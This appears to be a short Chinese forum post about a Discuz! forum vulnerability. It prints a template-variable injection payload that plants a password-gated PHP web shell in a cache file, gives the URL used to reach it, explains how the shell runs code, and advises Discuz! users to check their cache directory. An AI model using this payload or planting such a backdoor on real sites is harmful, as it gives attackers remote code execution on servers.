自定义模板变量: 变 量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')($_POST['A']);//} 替换内容 : aaaaaaaaaa
然后链接 http://www.site.com/forumdata/cache/usergroup_0.php
程序代码:
<?php (substr(md5($_POST['b']),28)=='7aaa') && ($_POST['a']);?>
对post的变量b进行md5加密,如果第28-31位是7aaa的话 就执行($_POST['a']);
使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件
|